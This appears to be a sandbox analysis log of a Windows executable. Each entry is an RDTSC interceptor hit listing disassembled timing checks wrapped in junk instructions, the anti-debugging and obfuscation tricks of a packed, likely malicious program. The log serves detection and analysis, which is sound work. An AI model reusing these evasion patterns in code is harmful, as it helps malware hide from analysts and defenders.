Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6043 second address: 5D6056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D74F0 second address: 5D74F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D74F4 second address: 5D74F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D75D2 second address: 5D75D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D7C06 second address: 5D7C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D8277 second address: 5D827B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D8327 second address: 5D832D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D832D second address: 5D8331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D84A8 second address: 5D84B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jo 00007F5A147D6A26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D84B9 second address: 5D84C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D84C2 second address: 5D84C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D85E5 second address: 5D85FC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D85FC second address: 5D8621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D1831h] 0x00000011 xchg eax, ebx 0x00000012 push esi 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D8B56 second address: 5D8B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9589 second address: 5D95A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5A147D6A34h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D95A6 second address: 5D95AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 597485 second address: 5974B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F5A147D6A30h 0x0000000c jmp 00007F5A147D6A35h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB38 second address: 5DBB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC4C1 second address: 5DC4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DD03A second address: 5DD03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DCD67 second address: 5DCD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DDAA5 second address: 5DDB22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F5A14B6C838h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movzx edi, ax 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F5A14B6C838h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D2BC7h] 0x0000004b push 00000000h 0x0000004d sub dword ptr [ebp+122D3BD8h], ecx 0x00000053 and edi, 05CDC9F1h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push esi 0x0000005d jng 00007F5A14B6C836h 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF1AC second address: 5DF1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A147D6A2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF1BE second address: 5DF1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DEF13 second address: 5DEF41 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5A147D6A35h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5A147D6A31h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF1C2 second address: 5DF24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F5A14B6C838h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov di, A276h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F5A14B6C838h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 mov di, dx 0x00000046 mov edi, dword ptr [ebp+1247209Ch] 0x0000004c push 00000000h 0x0000004e mov esi, dword ptr [ebp+122D2BDBh] 0x00000054 xchg eax, ebx 0x00000055 push ecx 0x00000056 jmp 00007F5A14B6C849h 0x0000005b pop ecx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5A14B6C83Ch 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF24F second address: 5DF261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF261 second address: 5DF267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF267 second address: 5DF26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1D3E second address: 5E1D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5A14B6C847h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1D5E second address: 5E1D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1D64 second address: 5E1D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E22D5 second address: 5E22D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E22D9 second address: 5E2368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5A14B6C836h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F5A14B6C83Ch 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F5A14B6C838h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f cmc 0x00000030 or bx, 564Ah 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F5A14B6C838h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 cld 0x00000052 push 00000000h 0x00000054 mov edi, dword ptr [ebp+1245E2E7h] 0x0000005a xchg eax, esi 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F5A14B6C846h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E2535 second address: 5E2540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E350F second address: 5E351D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E351D second address: 5E3521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5412 second address: 5E5426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F5A14B6C83Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5426 second address: 5E54C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub bx, ABC6h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F5A147D6A28h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 sub dword ptr [ebp+122D2031h], eax 0x0000003d mov eax, dword ptr [ebp+122D0D95h] 0x00000043 mov ebx, dword ptr [ebp+124485D6h] 0x00000049 adc di, 8A00h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F5A147D6A28h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a mov dword ptr [ebp+122D2031h], edx 0x00000070 mov dword ptr [ebp+122D1E86h], edx 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jnc 00007F5A147D6A26h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E72B4 second address: 5E72B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E54C8 second address: 5E54CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E72B8 second address: 5E72C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E54CE second address: 5E54E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F5A147D6A26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E72C1 second address: 5E72CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E54E0 second address: 5E54E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E72CD second address: 5E72D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EE221 second address: 5EE22B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5A147D6A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ED468 second address: 5ED472 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF128 second address: 5EF12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EA378 second address: 5EA42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F5A14B6C849h 0x0000000c nop 0x0000000d mov edi, esi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 sbb bx, C4D0h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F5A14B6C838h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov eax, dword ptr [ebp+122D02BDh] 0x00000042 adc di, 2CF7h 0x00000047 push FFFFFFFFh 0x00000049 call 00007F5A14B6C849h 0x0000004e cmc 0x0000004f pop ebx 0x00000050 sub edi, dword ptr [ebp+122D2A7Fh] 0x00000056 nop 0x00000057 jno 00007F5A14B6C842h 0x0000005d push eax 0x0000005e pushad 0x0000005f push ecx 0x00000060 jmp 00007F5A14B6C841h 0x00000065 pop ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EA42D second address: 5EA431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F01B7 second address: 5F01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F0380 second address: 5F0392 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007F5A147D6A26h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F33CD second address: 5F33E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F33E6 second address: 5F33EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F150A second address: 5F150E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F33EA second address: 5F3417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A37h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F5A147D6A26h 0x00000015 jo 00007F5A147D6A26h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F3417 second address: 5F3421 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5A14B6C836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7444 second address: 5F7448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7448 second address: 5F7455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7455 second address: 5F7475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A34h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7475 second address: 5F747B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F747B second address: 5F748E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5A147D6A26h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F748E second address: 5F7493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7493 second address: 5F74AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A33h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F74AB second address: 5F74B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FE81F second address: 5FE823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FE823 second address: 5FE829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FE829 second address: 5FE82E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FE82E second address: 5FE834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AAB3 second address: 59AAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AAB9 second address: 59AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59AABF second address: 59AAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5A147D6A28h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5A147D6A2Ch 0x00000012 jns 00007F5A147D6A28h 0x00000018 push esi 0x00000019 je 00007F5A147D6A26h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FDF69 second address: 5FDF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FE3BB second address: 5FE3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 603D61 second address: 603D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F5A14B6C836h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 js 00007F5A14B6C838h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 603D80 second address: 603DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F5A147D6A2Ah 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F5A147D6A28h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 603E75 second address: 603E7F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608D4C second address: 608D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6081E4 second address: 608201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5A14B6C841h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608201 second address: 608209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608209 second address: 60820E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60820E second address: 608241 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A38h 0x00000007 jne 00007F5A147D6A3Dh 0x0000000d jmp 00007F5A147D6A31h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6084A2 second address: 6084C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F5A14B6C843h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jne 00007F5A14B6C836h 0x00000013 popad 0x00000014 rdtsc
